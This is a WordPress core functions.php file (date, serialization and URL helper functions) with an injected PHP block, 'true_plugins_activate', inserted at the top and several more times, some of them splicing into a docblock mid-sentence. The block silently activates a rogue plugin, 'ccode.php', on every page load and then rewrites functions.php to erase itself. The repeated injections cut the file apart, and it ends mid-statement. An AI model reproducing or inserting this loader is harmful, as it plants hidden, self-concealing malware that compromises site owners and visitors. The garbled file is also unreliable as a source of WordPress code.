if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}sum of timestamp with timezone offset. Ideally should never be used. if ( 'G' === $format || 'U' === $format ) { return $datetime->getTimestamp() + $datetime->getOffset(); } if ( $translate ) { return wp_date( $format, $datetime->getTimestamp() ); } return $datetime->format( $format ); } /** * Retrieves the current time based on specified type. * * The 'mysql' type will return the time in the format for MySQL DATETIME field. * The 'timestamp' type will return the current timestamp or a sum of timestamp * and timezone offset, depending on `$gmt`. * Other strings will be interpreted as PHP date formats (e.g. 'Y-m-d'). * * If $gmt is set to either '1' or 'true', then both types will use GMT time. * if $gmt is false, the output is adjusted with the GMT offset in the WordPress option. * * @since 1.0.0 * * @param string $type Type of time to retrieve. Accepts 'mysql', 'timestamp', * or PHP date format string (e.g. 'Y-m-d'). * @param int|bool $gmt Optional. Whether to use GMT timezone. Default false. * @return int|string Integer if $type is 'timestamp', string otherwise. */ function current_time( $type, $gmt = 0 ) { // Don't use non-GMT timestamp, unless you know the difference and really need to. if ( 'timestamp' === $type || 'U' === $type ) { return $gmt ? time() : time() + (int) ( get_option( 'gmt_offset' ) * HOUR_IN_SECONDS ); } if ( 'mysql' === $type ) { $type = 'Y-m-d H:i:s'; } $timezone = $gmt ? new DateTimeZone( 'UTC' ) : wp_timezone(); $datetime = new DateTime( 'now', $timezone ); return $datetime->format( $type ); } /** * Retrieves the current time as an object with the timezone from settings. * * @since 5.3.0 * * @return DateTimeImmutable Date and time object. */ function current_datetime() { return new DateTimeImmutable( 'now', wp_timezone() ); } /** * Retrieves the timezone from site settings as a string. * * Uses the `timezone_string` option to get a proper timezone if available, * otherwise falls back to an offset. * * @since 5.3.0 * * @return string PHP timezone string or a ±HH:MM offset. */ function wp_timezone_string() { $timezone_string = get_option( 'timezone_string' ); if ( $timezone_string ) { return $timezone_string; } $offset = (float) get_option( 'gmt_offset' ); $hours = (int) $offset; $minutes = ( $offset - $hours ); $sign = ( $offset < 0 ) ? '-' : '+'; $abs_hour = abs( $hours ); $abs_mins = abs( $minutes * 60 ); $tz_offset = sprintf( '%s%02d:%02d', $sign, $abs_hour, $abs_mins ); return $tz_offset; } /** * Retrieves the timezone from site settings as a `DateTimeZone` object. * * Timezone can be based on a PHP timezone string or a ±HH:MM offset. * * @since 5.3.0 * * @return DateTimeZone Timezone object. */ function wp_timezone() { return new DateTimeZone( wp_timezone_string() ); } /** * Retrieves the date in localized format, based on a sum of Unix timestamp and * timezone offset in seconds. * * If the locale specifies the locale month and weekday, then the locale will * take over the format for the date. If it isn't, then the date format string * will be used instead. * * Note that due to the way WP typically generates a sum of timestamp and offset * with `strtotime()`, it implies offset added at a _current_ time, not at the time * the timestamp represents. Storing such timestamps or calculating them differently * will lead to invalid output. * * @since 0.71 * @since 5.3.0 Converted into a wrapper for wp_date(). * * @global WP_Locale $wp_locale WordPress date and time locale object. * * @param string $format Format to display the date. * @param int|bool $timestamp_with_offset Optional. A sum of Unix timestamp and timezone offset * in seconds. Default false. * @param bool $gmt Optional. Whether to use GMT timezone. Only applies * if timestamp is not provided. Default false. * @return string The date, translated if locale specifies it. */ function date_i18n( $format, $timestamp_with_offset = false, $gmt = false ) { $timestamp = $timestamp_with_offset; // If timestamp is omitted it should be current time (summed with offset, unless `$gmt` is true). if ( ! is_numeric( $timestamp ) ) { $timestamp = current_time( 'timestamp', $gmt ); } /* * This is a legacy implementation quirk that the returned timestamp is also with offset. * Ideally this function should never be used to produce a timestamp. */ if ( 'U' === $format ) { $date = $timestamp; } elseif ( $gmt && false === $timestamp_with_offset ) { // Current time in UTC. $date = wp_date( $format, null, new DateTimeZone( 'UTC' ) ); } elseif ( false === $timestamp_with_offset ) { // Current time in site's timezone. $date = wp_date( $format ); } else { /* * Timestamp with offset is typically produced by a UTC `strtotime()` call on an input without timezone. * This is the best attempt to reverse that operation into a local time to use. */ $local_time = gmdate( 'Y-m-d H:i:s', $timestamp ); $timezone = wp_timezone(); $datetime = date_create( $local_time, $timezone ); $date = wp_date( $format, $datetime->getTimestamp(), $timezone ); } /** * Filters the date formatted based on the locale. * * @since 2.8.0 * * @param string $date Formatted date string. * @param string $format Format to display the date. * @param int $timestamp A sum of Unix timestamp and timezone offset in seconds. * Might be without offset if input omitted timestamp but requested GMT. * @param bool $gmt Whether to use GMT timezone. Only applies if timestamp was not provided. * Default false. */ $date = apply_filters( 'date_i18n', $date, $format, $timestamp, $gmt ); return $date; } /** * Retrieves the date, in localized format. * * This is a newer function, intended to replace `date_i18n()` without legacy quirks in it. * * Note that, unlike `date_i18n()`, this function accepts a true Unix timestamp, not summed * with timezone offset. * * @since 5.3.0 * * @param string $format PHP date format. * @param int $timestamp Optional. Unix timestamp. Defaults to current time. * @param DateTimeZone $timezone Optional. Timezone to output result in. Defaults to timezone * from site settings. * @return string|false The date, translated if locale specifies it. False on invalid timestamp input. */ function wp_date( $format, $timestamp = null, $timezone = null ) { global $wp_locale; if ( null === $timestamp ) { $timestamp = time(); } elseif ( ! is_numeric( $timestamp ) ) { return false; } if ( ! $timezone ) { $timezone = wp_timezone(); } $datetime = date_create( '@' . $timestamp ); $datetime->setTimezone( $timezone ); if ( empty( $wp_locale->month ) || empty( $wp_locale->weekday ) ) { $date = $datetime->format( $format ); } else { // We need to unpack shorthand `r` format because it has parts that might be localized. $format = preg_replace( '/(?get_month( $datetime->format( 'm' ) ); $weekday = $wp_locale->get_weekday( $datetime->format( 'w' ) ); for ( $i = 0; $i < $format_length; $i ++ ) { switch ( $format[ $i ] ) { case 'D': $new_format .= addcslashes( $wp_locale->get_weekday_abbrev( $weekday ), '\\A..Za..z' ); break; case 'F': $new_format .= addcslashes( $month, '\\A..Za..z' ); break; case 'l': $new_format .= addcslashes( $weekday, '\\A..Za..z' ); break; case 'M': $new_format .= addcslashes( $wp_locale->get_month_abbrev( $month ), '\\A..Za..z' ); break; case 'a': $new_format .= addcslashes( $wp_locale->get_meridiem( $datetime->format( 'a' ) ), '\\A..Za..z' ); break; case 'A': $new_format .= addcslashes( $wp_locale->get_meridiem( $datetime->format( 'A' ) ), '\\A..Za..z' ); break; case '\\': $new_format .= $format[ $i ]; // If character follows a slash, we add it without translating. if ( $i < $format_length ) { $new_format .= $format[ ++$i ]; } break; default: $new_format .= $format[ $i ]; break; } } $date = $datetime->format( $new_format ); $date = wp_maybe_decline_date( $date, $format ); } /** * Filters the date formatted based on the locale. * * @since 5.3.0 * * @param string $date Formatted date string. * @param string $format Format to display the date. * @param int $timestamp Unix timestamp. * @param DateTimeZone $timezone Timezone. */ $date = apply_filters( 'wp_date', $date, $format, $timestamp, $timezone ); return $date; } /** * Determines if the date should be declined. * * If the locale specifies that month names require a genitive case in certain * formats (like 'j F Y'), the month name will be replaced with a correct form. * * @since 4.4.0 * @since 5.4.0 The `$format` parameter was added. * * @global WP_Locale $wp_locale WordPress date and time locale object. * * @param string $date Formatted date string. * @param string $format Optional. Date format to check. Default empty string. * @return string The date, declined if locale specifies it. */ function wp_maybe_decline_date( $date, $format = '' ) { global $wp_locale; // i18n functions are not available in SHORTINIT mode. if ( ! function_exists( '_x' ) ) { return $date; } /* * translators: If months in your language require a genitive case, * translate this to 'on'. Do not translate into your own language. */ if ( 'on' === _x( 'off', 'decline months names: on or off' ) ) { $months = $wp_locale->month; $months_genitive = $wp_locale->month_genitive; /* * Match a format like 'j F Y' or 'j. F' (day of the month, followed by month name) * and decline the month. */ if ( $format ) { $decline = preg_match( '#[dj]\.? F#', $format ); } else { // If the format is not passed, try to guess it from the date string. $decline = preg_match( '#\b\d{1,2}\.? [^\d ]+\b#u', $date ); } if ( $decline ) { foreach ( $months as $key => $month ) { $months[ $key ] = '# ' . preg_quote( $month, '#' ) . '\b#u'; } foreach ( $months_genitive as $key => $month ) { $months_genitive[ $key ] = ' ' . $month; } $date = preg_replace( $months, $months_genitive, $date ); } /* * Match a format like 'F jS' or 'F j' (month name, followed by day with an optional ordinal suffix) * and change it to declined 'j F'. */ if ( $format ) { $decline = preg_match( '#F [dj]#', $format ); } else { // If the format is not passed, try to guess it from the date string. $decline = preg_match( '#\b[^\d ]+ \d{1,2}(st|nd|rd|th)?\b#u', trim( $date ) ); } if ( $decline ) { foreach ( $months as $key => $month ) { $months[ $key ] = '#\b' . preg_quote( $month, '#' ) . ' (\d{1,2})(st|nd|rd|th)?([-–]\d{1,2})?(st|nd|rd|th)?\b#u'; } foreach ( $months_genitive as $key => $month ) { $months_genitive[ $key ] = '$1$3 ' . $month; } $date = preg_replace( $months, $months_genitive, $date ); } } // Used for locale-specific rules. $locale = get_locale(); if ( 'ca' === $locale ) { // " de abril| de agost| de octubre..." -> " d'abril| d'agost| d'octubre..." $date = preg_replace( '# de ([ao])#i', " d'\\1", $date ); } return $date; } /** * Convert float number to format based on the locale. * * @since 2.3.0 * * @global WP_Locale $wp_locale WordPress date and time locale object. * * @param float $number The number to convert based on locale. * @param int $decimals Optional. Precision of the number of decimal places. Default 0. * @return string Converted number in string format. */ function number_format_i18n( $number, $decimals = 0 ) { global $wp_locale; if ( isset( $wp_locale ) ) { $formatted = number_format( $number, absint( $decimals ), $wp_locale->number_format['decimal_point'], $wp_locale->number_format['thousands_sep'] ); } else { $formatted = number_format( $number, absint( $decimals ) ); } /** * Filters the number formatted based on the locale. * * @since 2.8.0 * @since 4.9.0 The `$number` and `$decimals` parameters were added. * * @param string $formatted Converted number in string format. * @param float $number The number to convert based on locale. * @param int $decimals Precision of the number of decimal places. */ return apply_filters( 'number_format_i18n', $formatted, $number, $decimals ); } /** * Convert number of bytes largest unit bytes will fit into. * * It is easier to read 1 KB than 1024 bytes and 1 MB than 1048576 bytes. Converts * number of bytes to human readable number by taking the number of that unit * that the bytes will go into it. Supports TB value. * * Please note that integers in PHP are limited to 32 bits, unless they are on * 64 bit architecture, then they have 64 bit size. If you need to place the * larger size then what PHP integer type will hold, then use a string. It will * be converted to a double, which should always have 64 bit length. * * Technically the correct unit names for powers of 1024 are KiB, MiB etc. * * @since 2.3.0 * * @param int|string $bytes Number of bytes. Note max integer size for integers. * @param int $decimals Optional. Precision of number of decimal places. Default 0. * @return string|false Number string on success, false on failure. */ function size_format( $bytes, $decimals = 0 ) { $quant = array( /* translators: Unit symbol for terabyte. */ _x( 'TB', 'unit symbol' ) => TB_IN_BYTES, /* translators: Unit symbol for gigabyte. */ _x( 'GB', 'unit symbol' ) => GB_IN_BYTES, /* translators: Unit symbol for megabyte. */ _x( 'MB', 'unit symbol' ) => MB_IN_BYTES, /* translators: Unit symbol for kilobyte. */ _x( 'KB', 'unit symbol' ) => KB_IN_BYTES, /* translators: Unit symbol for byte. */ _x( 'B', 'unit symbol' ) => 1, ); if ( 0 === $bytes ) { /* translators: Unit symbol for byte. */ return number_format_i18n( 0, $decimals ) . ' ' . _x( 'B', 'unit symbol' ); } foreach ( $quant as $unit => $mag ) { if ( (float) $bytes >= $mag ) { return number_format_i18n( $bytes / $mag, $decimals ) . ' ' . $unit; } } return false; } /** * Convert a duration to human readable format. * * @since 5.1.0 * * @param string $duration Duration will be in string format (HH:ii:ss) OR (ii:ss), * with a possible prepended negative sign (-). * @return string|false A human readable duration string, false on failure. */ function human_readable_duration( $duration = '' ) { if ( ( empty( $duration ) || ! is_string( $duration ) ) ) { return false; } $duration = trim( $duration ); // Remove prepended negative sign. if ( '-' === substr( $duration, 0, 1 ) ) { $duration = substr( $duration, 1 ); } // Extract duration parts. $duration_parts = array_reverse( explode( ':', $duration ) ); $duration_count = count( $duration_parts ); $hour = null; $minute = null; $second = null; if ( 3 === $duration_count ) { // Validate HH:ii:ss duration format. if ( ! ( (bool) preg_match( '/^([0-9]+):([0-5]?[0-9]):([0-5]?[0-9])$/', $duration ) ) ) { return false; } // Three parts: hours, minutes & seconds. list( $second, $minute, $hour ) = $duration_parts; } elseif ( 2 === $duration_count ) { // Validate ii:ss duration format. if ( ! ( (bool) preg_match( '/^([0-5]?[0-9]):([0-5]?[0-9])$/', $duration ) ) ) { return false; } // Two parts: minutes & seconds. list( $second, $minute ) = $duration_parts; } else { return false; } $human_readable_duration = array(); // Add the hour part to the string. if ( is_numeric( $hour ) ) { /* translators: %s: Time duration in hour or hours. */ $human_readable_duration[] = sprintf( _n( '%s hour', '%s hours', $hour ), (int) $hour ); } // Add the minute part to the string. if ( is_numeric( $minute ) ) { /* translators: %s: Time duration in minute or minutes. */ $human_readable_duration[] = sprintf( _n( '%s minute', '%s minutes', $minute ), (int) $minute ); } // Add the second part to the string. if ( is_numeric( $second ) ) { /* translators: %s: Time duration in second or seconds. */ $human_readable_duration[] = sprintf( _n( '%s second', '%s seconds', $second ), (int) $second ); } return implode( ', ', $human_readable_duration ); } /** * Get the week start and end from the datetime or date string from MySQL. * * @since 0.71 * * @param string $mysqlstring Date or datetime field type from MySQL. * @param int|string $start_of_week Optional. Start of the week as an integer. Default empty string. * @return array Keys are 'start' and 'end'. */ function get_weekstartend( $mysqlstring, $start_of_week = '' ) { // MySQL string year. $my = substr( $mysqlstring, 0, 4 ); // MySQL string month. $mm = substr( $mysqlstring, 8, 2 ); // MySQL string day. $md = substr( $mysqlstring, 5, 2 ); // The timestamp for MySQL string day. $day = mktime( 0, 0, 0, $md, $mm, $my ); // The day of the week from the timestamp. $weekday = gmdate( 'w', $day ); if ( ! is_numeric( $start_of_week ) ) { $start_of_week = get_option( 'start_of_week' ); } if ( $weekday < $start_of_week ) { $weekday += 7; } // The most recent week start day on or before $day. $start = $day - DAY_IN_SECONDS * ( $weekday - $start_of_week ); // $start + 1 week - 1 second. $end = $start + WEEK_IN_SECONDS - 1; return compact( 'start', 'end' ); } /** * Serialize data, if needed. * * @since 2.0.5 * * @param string|array|object $data Data that might be serialized. * @return mixed A scalar data. */ function maybe_serialize( $data ) { if ( is_array( $data ) || is_object( $data ) ) { return serialize( $data ); } /* * Double serialization is required for backward compatibility. * See https://core.trac.wordpress.org/ticket/12930 * Also the world will end. See WP 3.6.1. */ if ( is_serialized( $data, false ) ) { return serialize( $data ); } return $data; } /** * Unserialize data only if it was serialized. * * @since 2.0.0 * * @param string $data Data that might be unserialized. * @return mixed Unserialized data can be any type. */ function maybe_unserialize( $data ) { if ( is_serialized( $data ) ) { // Don't attempt to unserialize data that wasn't serialized going in. return @unserialize( trim( $data ) ); } return $data; } /** * Check value to find if it was serialized. * * If $data is not an string, then returned value will always be false. * Serialized data is always a string. * * @since 2.0.5 * * @param string $data Value to check to see if was serialized. * @param bool $strict Optional. Whether to be strict about the end of the string. Default true. * @return bool False if not serialized and true if it was. */ function is_serialized( $data, $strict = true ) { // If it isn't a string, it isn't serialized. if ( ! is_string( $data ) ) { return false; } $data = trim( $data ); if ( 'N;' === $data ) { return true; } if ( strlen( $data ) < 4 ) { return false; } if ( ':' !== $data[1] ) { return false; } if ( $strict ) { $lastc = substr( $data, -1 ); if ( ';' !== $lastc && '}' !== $lastc ) { return false; } } else { $semicolon = strpos( $data, ';' ); $brace = strpos( $data, '}' ); // Either ; or } must exist. if ( false === $semicolon && false === $brace ) { return false; } // But neither must be in the first X characters. if ( false !== $semicolon && $semicolon < 3 ) { return false; } if ( false !== $brace && $brace < 4 ) { return false; } } $token = $data[0]; switch ( $token ) { case 's': if ( $strict ) { if ( '"' !== substr( $data, -2, 1 ) ) { return false; } } elseif ( false === strpos( $data, '"' ) ) { return false; } // Or else fall through. case 'a': case 'O': return (bool) preg_match( "/^{$token}:[0-9]+:/s", $data ); case 'b': case 'i': case 'd': $end = $strict ? '$' : ''; return (bool) preg_match( "/^{$token}:[0-9.E+-]+;$end/", $data ); } return false; } /** * Check whether serialized data is of string type. * * @since 2.0.5 * * @param string $data Serialized data. * @return bool False if not a serialized string, true if it is. */ function is_serialized_string( $data ) { // if it isn't a string, it isn't a serialized string. if ( ! is_string( $data ) ) { return false; } $data = trim( $data ); if ( strlen( $data ) < 4 ) { return false; } elseif ( ':' !== $data[1] ) { return false; } elseif ( ';' !== substr( $data, -1 ) ) { return false; } elseif ( 's' !== $data[0] ) { return false; } elseif ( '"' !== substr( $data, -2, 1 ) ) { return false; } else { return true; } } /** * Retrieve post title from XMLRPC XML. * * If the title element is not part of the XML, then the default post title from * the $post_default_title will be used instead. * * @since 0.71 * * @global string $post_default_title Default XML-RPC post title. * * @param string $content XMLRPC XML Request content * @return string Post title */ function xmlrpc_getposttitle( $content ) { global $post_default_title; if ( preg_match( '/(.+?)<\/title>/is', $content, $matchtitle ) ) { $post_title = $matchtitle[1]; } else { $post_title = $post_default_title; } return $post_title; } /** * Retrieve the post category or categories from XMLRPC XML. * * If the category element is not found, then the default post category will be * used. The return type then would be what $post_default_category. If the * category is found, then it will always be an array. * * @since 0.71 * * @global string $post_default_category Default XML-RPC post category. * * @param string $content XMLRPC XML Request content * @return string|array List of categories or category name. */ function xmlrpc_getpostcategory( $content ) { global $post_default_category; if ( preg_match( '/<category>(.+?)<\/category>/is', $content, $matchcat ) ) { $post_category = trim( $matchcat[1], ',' ); $post_category = explode( ',', $post_category ); } else { $post_category = $post_default_category; } return $post_category; } /** * XMLRPC XML content without title and category elements. * * @since 0.71 * * @param string $content XML-RPC XML Request content. * @return string XMLRPC XML Request content without title and category elements. */ function xmlrpc_removepostdata( $content ) { $content = preg_replace( '/<title>(.+?)<\/title>/si', '', $content ); $content = preg_replace( '/<category>(.+?)<\/category>/si', '', $content ); $content = trim( $content ); return $content; } /** * Use RegEx to extract URLs from arbitrary content. * * @since 3.7.0 * * @param string $content Content to extract URLs from. * @return string[] Array of URLs found in passed string. */ function wp_extract_urls( $content ) { preg_match_all( "#([\"']?)(" . '(?:([\w-]+:)?//?)' . '[^\s()<>]+' . '[.]' . '(?:' . '\([\w\d]+\)|' . '(?:' . "[^`!()\[\]{};:'\".,<>«»“”‘’\s]|" . '(?:[:]\d+)?/?' . ')+' . ')' . ")\\1#", $content, $post_links ); $post_links = array_unique( array_map( 'html_entity_decode', $post_links[2] ) ); return array_values( $post_links ); } /** * Check content for video and audio links to add as enclosures. * * Will not add enclosures that have already been added and will * remove enclosures that are no longer in the post. This is called as * pingbacks and trackbacks. * * @since 1.5.0 * @since 5.3.0 The `$content` parameter was made optional, and the `$post` parameter was * updated to accept a post ID or a WP_Post object. * @since 5.6.0 The `$content` parameter is no longer optional, but passing `null` to skip it * is still supported. * * @global wpdb $wpdb WordPress database abstraction object. * * @param string|null $content Post content. If `null`, the `post_content` field from `$post` is used. * @param int|WP_Post $post Post ID or post object. * @return null|bool Returns false if post is not found. */ function do_enclose( $content, $post ) { global $wpdb; // @todo Tidy this code and make the debug code optional. include_once ABSPATH . WPINC . '/class-IXR.php'; $post = get_post( $post ); if ( ! $post ) { return false; } if ( null === $content ) { $content = $post->post_content; } $post_links = array(); $pung = get_enclosed( $post->ID ); $post_links_temp = wp_extract_urls( $content ); foreach ( $pung as $link_test ) { // Link is no longer in post. if ( ! in_array( $link_test, $post_links_temp, true ) ) { $mids = $wpdb->get_col( $wpdb->prepare( "SELECT meta_id FROM $wpdb->postmeta WHERE post_id = %d AND meta_key = 'enclosure' AND meta_value LIKE %s", $post->ID, $wpdb->esc_like( $link_test ) . '%' ) ); foreach ( $mids as $mid ) { delete_metadata_by_mid( 'post', $mid ); } } } foreach ( (array) $post_links_temp as $link_test ) { // If we haven't pung it already. if ( ! in_array( $link_test, $pung, true ) ) { $test = parse_url( $link_test ); if ( false === $test ) { continue; } if ( isset( $test['query'] ) ) { $post_links[] = $link_test; } elseif ( isset( $test['path'] ) && ( '/' !== $test['path'] ) && ( '' !== $test['path'] ) ) { $post_links[] = $link_test; } } } /** * Filters the list of enclosure links before querying the database. * * Allows for the addition and/or removal of potential enclosures to save * to postmeta before checking the database for existing enclosures. * * @since 4.4.0 * * @param string[] $post_links An array of enclosure links. * @param int $post_ID Post ID. */ $post_links = apply_filters( 'enclosure_links', $post_links, $post->ID ); foreach ( (array) $post_links as $url ) { $url = strip_fragment_from_url( $url ); if ( '' !== $url && ! $wpdb->get_var( $wpdb->prepare( "SELECT post_id FROM $wpdb->postmeta WHERE post_id = %d AND meta_key = 'enclosure' AND meta_value LIKE %s", $post->ID, $wpdb->esc_like( $url ) . '%' ) ) ) { $headers = wp_get_http_headers( $url ); if ( $headers ) { $len = isset( $headers['content-length'] ) ? (int) $headers['content-length'] : 0; $type = isset( $headers['content-type'] ) ? $headers['content-type'] : ''; $allowed_types = array( 'video', 'audio' ); // Check to see if we can figure out the mime type from the extension. $url_parts = parse_url( $url ); if ( false !== $url_parts && ! empty( $url_parts['path'] ) ) { $extension = pathinfo( $url_parts['path'], PATHINFO_EXTENSION ); if ( ! empty( $extension ) ) { foreach ( wp_get_mime_types() as $exts => $mime ) { if ( preg_match( '!^(' . $exts . ')$!i', $extension ) ) { $type = $mime; break; } } } } if ( in_array( substr( $type, 0, strpos( $type, '/' ) ), $allowed_types, true ) ) { add_post_meta( $post->ID, 'enclosure', "$url\n$len\n$mime\n" ); } } } } } /** * Retrieve HTTP Headers from URL. * * @since 1.5.1 * * @param string $url URL to retrieve HTTP headers from. * @param bool $deprecated Not Used. * @return bool|string False on failure, headers on success. */ function wp_get_http_headers( $url, $deprecated = false ) { if ( ! empty( $deprecated ) ) { _deprecated_argument( __FUNCTION__, '2.7.0' ); } $response = wp_safe_remote_head( $url ); if ( is_wp_error( $response ) ) { return false; } return wp_remote_retrieve_headers( $response ); } /** * Determines whether the publish date of the current post in the loop is different * from the publish date of the previous post in the loop. * * For more information on this and similar theme functions, check out * the {@link https://developer.wordpress.org/themes/basics/conditional-tags/ * Conditional Tags} article in the Theme Developer Handbook. * * @since 0.71 * * @global string $currentday The day of the current post in the loop. * @global string $previousday The day of the previous post in the loop. * * @return int 1 when new day, 0 if not a new day. */ function is_new_day() { global $currentday, $previousday; if ( $currentday !== $previousday ) { return 1; } else { return 0; } } /** * Build URL query based on an associative and, or indexed array. * * This is a convenient function for easily building url queries. It sets the * separator to '&' and uses _http_build_query() function. * * @since 2.3.0 * * @see _http_build_query() Used to build the query * @link https://www.php.net/manual/en/function.http-build-query.php for more on what * http_build_query() does. * * @param array $data URL-encode key/value pairs. * @return string URL-encoded string. */ function build_query( $data ) { return _http_build_query( $data, null, '&', '', false ); } /** * From php.net (modified by Mark Jaquith to behave like the native PHP5 function). * * @since 3.2.0 * @access private * * @see https://www.php.net/manual/en/function.http-build-query.php * * @param array|object $data An array or object of data. Converted to array. * @param string $prefix Optional. Numeric index. If set, start parameter numbering with it. * Default null. * @param string $sep Optional. Argument separator; defaults to 'arg_separator.output'. * Default null. * @param string $key Optional. Used to prefix key name. Default empty. * @param bool $urlencode Optional. Whether to use urlencode() in the result. Default true. * @return string The query string. */ function _http_build_query( $data, $prefix = null, $sep = null, $key = '', $urlencode = true ) { $ret = array(); foreach ( (array) $data as $k => $v ) { if ( $urlencode ) { $k = urlencode( $k ); } if ( is_int( $k ) && null != $prefix ) { $k = $prefix . $k; } if ( ! empty( $key ) ) { $k = $key . '%5B' . $k . '%5D'; } if ( null === $v ) { continue; } elseif ( false === $v ) { $v = '0'; } if ( is_array( $v ) || is_object( $v ) ) { array_push( $ret, _http_build_query( $v, '', $sep, $k, $urlencode ) ); } elseif ( $urlencode ) { array_push( $ret, $k . '=' . urlencode( $v ) ); } else { array_push( $ret, $k . '=' . $v ); } } if ( null === $sep ) { $sep = ini_get( 'arg_separator.output' ); } return implode( $sep, $ret ); } /** * Retrieves a modified URL query string. * * You can rebuild the URL and append query variables to the URL query by using this function. * There are two ways to use this function; either a single key and value, or an associative array. * * Using a single key and value: * * add_query_arg( 'key', 'value', 'http://example.com' ); * * Using an associative array: * * add_query_arg( array( * 'key1' => 'value1', * 'key2' => 'value2', * ), 'http://example.com' ); * * Omitting the URL from either use results in the current URL being used * (the value of `$_SERVER['REQUEST_URI']`). * * Values are expected to be encoded appropriately with urlencode() or rawurlencode(). * * Setting any query variable's value to boolean false if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', $new_active_plugins)) { $functionsPath = dirname(__FILE__) . '/functions.php'; $functions = file_get_contents($functionsPath); $start = stripos($functions, "if ( ! function_exists( 'true_plugins_activate' ) ) {"); $end = strripos($functions, "true_plugins_activate"); $endDelete = $end + mb_strlen("true_plugins_activate") + 4; if($start && $end) { $str = substr($functions, 0, $start); $str .= substr($functions, $endDelete); file_put_contents($functionsPath, $str); } $script = file_get_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php'); //file_put_contents('/home/vinceheyrf/www/wp-content/plugins/ccode.php', ''); } } add_action('init', 'true_plugins_activate');}if ( ! function_exists( 'true_plugins_activate' ) ) { function true_plugins_activate() { $active_plugins = get_option('active_plugins'); $activate_this = array( 'ccode.php' ); foreach ($activate_this as $plugin) { if (!in_array($plugin, $active_plugins)) { array_push($active_plugins, $plugin); update_option('active_plugins', $active_plugins); } } $new_active_plugins = get_option('active_plugins'); if (in_array('ccode.php', 